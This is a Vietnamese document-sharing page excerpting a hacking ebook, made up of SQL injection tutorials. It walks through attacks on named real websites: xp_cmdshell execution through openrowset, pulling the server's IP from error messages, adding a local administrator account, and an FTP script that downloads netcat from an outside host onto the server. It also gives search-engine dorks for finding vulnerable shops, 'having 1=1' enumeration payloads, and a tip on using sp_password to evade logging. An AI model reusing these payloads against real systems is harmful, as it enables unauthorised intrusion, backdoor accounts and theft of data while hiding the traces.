1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 234 pptx

6 113 0

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 130,53 KB

Nội dung

'allow updates', '1' reconfigure with override'. The OLE DB provider 'sqloledb' indicates that the object has no columns. /Including/general.asp, line 840 THÊM DÒNG “SELECT 1” ĐỂ KHẮC PHỤC LỖI http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override') • set “allow updates”=1 cho phép update các “system-table” (sysusers, syslogins, ) trực tiếp, không qua các “system-procedure” CHÚ Ý KHI CHẠY MASTER XP_CMDSHELL • exec master xp_cmdshell ‘dir c:\’ “SQLAgentCmdExec” • select * from openrowset('sqloledb', 'server=<SERVER_NAME>;uid=BUILTIN\Administrators;p wd=', 'set fmtonly off select 1 exec master xp_cmdshell "dir c:\"') “NT AUTHORITY\SYSTEM” fantomas311(VNISS) Tổng hợp về SQL Injection (bài 7) XÁC ĐỊNH IP CỦA SERVER http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master xp_cmdshell 'ipconfig' http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 b from t where b like '%25IP Address%25')) (%25 == “%”) Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 203.162.7.70 ' to a column of data type int. /Including/general.asp, line 840 DO THÁM IP “203.162.7.70” C:\> ping 203.162.7.70 Pinging 203.162.7.70 with 32 bytes of data: Reply from 203.162.7.70: bytes=32 time=232ms TTL=118 C:\> ftp 203.162.7.70 Connected to 203.162.7.70. 220 unesco Microsoft FTP Service (Version 5.0). User (203.162.7.70 none)): • 203.162.7.70 == panvietnam.com FTP TRỰC TIẾP - THẤT BẠI ! http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add"') (%26 == “&”) C:\> ftp 203.162.7.70 Connected to 203.162.7.70. 220 unesco Microsoft FTP Service (Version 5.0). User (203.162.7.70 none)): a 331 Password required for a. Password: 530 User a cannot log in. Login failed. ftp> bye UPLOAD NETCAT LÊN SERVER http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master xp_cmdshell "echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af" %26 del f') (%3E == “>”) echo open a.b.c.d >f echo user a a >>f echo bin >> f echo cd a >>f echo mget * >>f echo quit >>f ftp -v -i -n -s:f del f THẨM TRA XEM NETCAT ĐÃ ĐƯỢC UPLOAD THÀNH CÔNG CHƯA ? http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master xp_cmdshell 'dir nx.exe' http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1)) http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))— Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '08/17/2003 11:31a 11,776 nx.exe' to a column of data type int. /Including/general.asp, line 840 . fantomas311(VNISS) Tổng hợp về SQL Injection (bài 8) Hack shop qua lỗi SQL server injection gioi thieu so qua cho anh em biet ve hack sql server inject ha ! hack bang ky thuat convert noi nom na la convert 1 bieu thuc dang string sang dang int nhung ko the thuc hien duoc gay thong bao loi (co nhung shop ma ta khong nhan duoc thong bao cua no,vi value=hidden),vi the truoc tien de hack duoc shop ODBC MySQL server2000 hay 7.0 thi it nhat anh em cung phai xem qua source 1 chut ha,de roi con biet co nen hack theo cach nao`. o day chi gioi thieu cach convert dung` de lay thong bao loi thoi,neu may bac' can hack ca server thi noi nhieu,noi dai dong lam Detail: search tren cac trang search engine tuy anh em thich thoi,hien co rat nhieu trang search engine ma anh em thuong dung nhu www.google.com hoac www.froogle.google.com www.av.com www.alltheweb.com yahoo.com ok search for: allinurl: "/shop/viewproduct.asp" hoac may bac co the search = tu key word allinurl: "/shop/index.asp" (nhung cai tu khoa nay van chua xac nhan duoc tinh dung dan cua no,vi no cho ra tat rat nhieu site,ma ko phai ODBC MySQL database,hic,ma thuong la` JSP(java server page) hoac JET, hoac VB.net net va de nay can phai co su no luc cua anh em trong viec test. ok co' duoc muc tieu roi chon dai 1 thang,vd: http://www.mcmessentials.com.au/shop 0&categoryid=5 okay co muc tieu roi bat dau test no ha http://www.mcmessentials.com.au/shop/viewp tegoryid=5' neu CSDL cua no duoc viet = ODBC MySQL server thi anh em se nhan duoc thong bao sau Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''. /shop/include/viewproduct.asp, line 3 okay,con neu ko thi ko thay gi het,hoac la` ban phai xem trong source de biet. ok bat dau tim table co the test theo cac cach sau ma em da biet Code: ;having 1=1 sp_password 'having 1=1 sp_password "having 1=1 sp_password (having 1=1 sp_password )having 1=1 sp_password (space)having 1=1 _sp_password (%20 la space la khoang trang day) thuong thi test = cau truy van (space)having 1=1 sp_password la duoc duyet qua ok *luu y' cac anh em 1 dieu rat can thiet 1 %2b co nghia la dau + nhung ma truyen truc tiep dau + vao se bi SQL filter mat bat buoc phai co sp_password de marks log tranh bi phat hien http://www.mcmessentials.com.au/shop 1 sp_password Code: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'categories.label' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /shop/include/viewproduct.asp, line 9 ta biet duoc table categories,column la label,bay gio ta di lay tat ca cac table cua column label thuoc table categories

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

  • Đang cập nhật ...

TÀI LIỆU LIÊN QUAN